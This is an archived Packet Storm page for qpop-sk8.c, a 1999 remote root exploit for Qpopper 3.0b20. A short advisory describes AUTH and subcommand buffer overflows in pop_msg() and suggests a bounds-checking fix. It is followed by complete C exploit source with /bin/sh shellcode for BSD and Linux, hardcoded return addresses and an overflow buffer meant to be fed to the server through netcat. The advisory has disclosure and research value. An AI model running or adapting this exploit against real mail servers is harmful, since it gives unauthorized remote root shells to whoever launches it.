exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

qpop-sk8.c

qpop-sk8.c
Posted Dec 2, 1999
Authored by sk8 | Site lucid-solutions.com

Qpopper 3.0b remote root exploit, tested on tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, and Linux.

tags | exploit, remote, root
systems | linux, freebsd
SHA-256 | 4838a4454622b456ed9380a043cedb9492cba751e4b9545b07c53e94f1ff6336

qpop-sk8.c

Change Mirror Download
 Date: Tue Nov 30 1999 01:25:25
Author: Lucid Solutions

I found this overflow myself earlier this month. Seems someone
else recently found it before Qualcomm was able to issue a patch. The 2.x
series is not vunlnerable because AUTH is not yet supported and the error
returned by attempting to use AUTH does not call pop_msg() with any user
input.

There is also another overflow besides the AUTH overflow which can
occur if a valid username and password are first entered also occuring in
pop_msg().
pop_get_subcommand.c contains this line near the bottom in qpopper3.0b20:
pop_msg(p,POP_FAILURE,
"Unknown command: \"%s %s\".",p->pop_command,p->pop_subcommand);

No bounds checking is done on the attempted subcommand. It is
interesting to note that in qpop 2.53, a similar line is used, but with
limits on the string length!
pop_msg(p,POP_FAILURE,
"Unknown command: \"%.128s %.128s\".",p->pop_command,
p->pop_subcommand);


I guess Qualcomm did not continue development of Qpopper directly from the
2.53 series, but rewrote code from scratch and/or based it on earlier
code.

As a solution, pop_msg() should also do bounds checking, and not make the
calling line responsible for it (althought that's good practice too).

Attached is my original exploit that works on *BSD and Linux. (Solaris is
NOT vulnerable to the AUTH overflow). Slight modification is needed on
one line as the comments say. This exploit will actually work on the
majority of machines then. Qualcomm: you have already received my working
xploit with no modification needed.

Let's hope for an official patch soon.


- sk8@lucid-solutions.com
http://www.lucid-solutions.com


/* QPOP version 3.0b20 and lower beta versions REMOTE EXPLOIT
* combination *BSD and Linux
*
* sk8@lucid-solutions.com
* http://www.lucid-solutions.com
*
* I have written this to test and demonstrate vulnerabilities on clients'
* systems only.
*
* !!!!!!!!!!DO NOT distribute!!!!!!!!!!
* (at least not until Qualcomm issues a patch)
*
* You may only use this to test your own system(s).
* I am not responsible for any unauthorized use of this program.
*
* tested on BSDI 3.0/4.0.1, FreeBSD 2.2.8/3.3, Linux
*
* Since popper is usually compiled by the admin, return addresses will vary,
* but I have included common values. You may have to provide an offset
* to get it to work on your system.
*
* I wrote the exploit near the beginning of November 1999, and unlike some
* other exploits I've seen since, this one works even on Linux boxes on which
* inetd was not started from a shell prompt.
*
* One minor change must be made for this to exploit the AUTH overflow.
*
* Usage: If you can't figure out how to use this, you shouldn't
* be in the security business. (try netcat)
*/

#include <stdio.h>
#include <stdlib.h>
#include <sys/time.h>
#include <sys/types.h>
#include <unistd.h>
#include <sys/socket.h>
#include <netinet/in.h>
#include <netdb.h>

unsigned int NOP=0x90;

unsigned long offset=0; /* default offset */

char bsdsc[]=
"\xeb\x32\x5e\x31\xdb\x89\x5e\x07\x89\x5e\x12\x89\x5e\x17"
"\x88\x5e\x1c\x8d\x1e\x89\x5e\x0e\x31\xc0\xb0\x3b\x8d\x7e"
"\x0e\x89\xfa\x89\xf9\xbf\x10\x10\x10\x10\x29\x7e\xf5\x89"
"\xcf\xeb\x01\xff\x62\x61\x63\x60\xeb\x1b\xe8\xc9\xff\xff"
"\xff/bin/sh\xaa\xaa\xaa\xaa\xff\xff\xff\xbb\xbb\xbb\xbb"
"\xcc\xcc\xcc\xcc\x9a\xaa\xaa\xaa\xaa\x07\xaa";

char linuxsc[]=
"\xeb\x22\x5e\x89\xf3\x89\xf7\x83\xc7\x07\x31\xc0\xaa"
"\x89\xf9\x89\xf0\xab\x89\xfa\x31\xc0\xab\xb0\x08\x04"
"\x03\xcd\x80\x31\xdb\x89\xd8\x40\xcd\x80\xe8\xd9\xff"
"\xff\xff/bin/sh";

struct version {
int num;
char* systype;
int buffer_length;
long address;
};

struct version verlist[] = {
{0, "BSDI 2.x/3.x, FreeBSD 2.x", 1001, 0xefbfd56c},
{1, "BSDI 4.x", 1001, 0x8047564},
{2, "FreeBSD 3.x", 1001, 0xbfbfd3dc},
{3, "Linux", 990, 0xbfffd304},
{0, 0, 0, 0}
};

int main(int argc, char** argv) {
char* buffer, *shellcode;
int buflen, i=0, ver, retaddr, align=0;
struct sockaddr_in sockaddr;
struct hostent* host;

if (argc < 2) {
printf("Usage: %s version [offset]\n", argv[0]);
i=-1;
printf("\nAvailable versions:\n");
while (verlist[++i].systype) {
printf(" %d: %s\n", verlist[i].num, verlist[i].systype);
}
printf("\n");
exit(-1);
}

ver=atoi(argv[1]);
if (argc > 2) {
offset=atoi(argv[2]);
}
if (strstr(verlist[ver].systype, "Linux")) {
shellcode=linuxsc;
align=2;
}
else shellcode=bsdsc;

buflen=verlist[ver].buffer_length;
retaddr=verlist[ver].address;

buffer=(char*)malloc(buflen);
memset(buffer, NOP, buflen);
memcpy(buffer, "AUTH ", 4);
memcpy(buffer+800, shellcode, strlen(shellcode));
for (i=800+strlen(shellcode)+align; i< buflen-4; i+=4) {
*((unsigned long int *)&buffer[i])=retaddr+offset;
}
buffer[buflen-2]='\n';
buffer[buflen-1]='\n';

printf("%s\n", buffer);
}


Login or Register to add favorites

File Archive:

March 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Mar 1st
    16 Files
  • 2
    Mar 2nd
    0 Files
  • 3
    Mar 3rd
    0 Files
  • 4
    Mar 4th
    32 Files
  • 5
    Mar 5th
    28 Files
  • 6
    Mar 6th
    42 Files
  • 7
    Mar 7th
    17 Files
  • 8
    Mar 8th
    13 Files
  • 9
    Mar 9th
    0 Files
  • 10
    Mar 10th
    0 Files
  • 11
    Mar 11th
    15 Files
  • 12
    Mar 12th
    19 Files
  • 13
    Mar 13th
    21 Files
  • 14
    Mar 14th
    38 Files
  • 15
    Mar 15th
    15 Files
  • 16
    Mar 16th
    0 Files
  • 17
    Mar 17th
    0 Files
  • 18
    Mar 18th
    10 Files
  • 19
    Mar 19th
    32 Files
  • 20
    Mar 20th
    46 Files
  • 21
    Mar 21st
    16 Files
  • 22
    Mar 22nd
    13 Files
  • 23
    Mar 23rd
    0 Files
  • 24
    Mar 24th
    0 Files
  • 25
    Mar 25th
    12 Files
  • 26
    Mar 26th
    31 Files
  • 27
    Mar 27th
    19 Files
  • 28
    Mar 28th
    0 Files
  • 29
    Mar 29th
    0 Files
  • 30
    Mar 30th
    0 Files
  • 31
    Mar 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close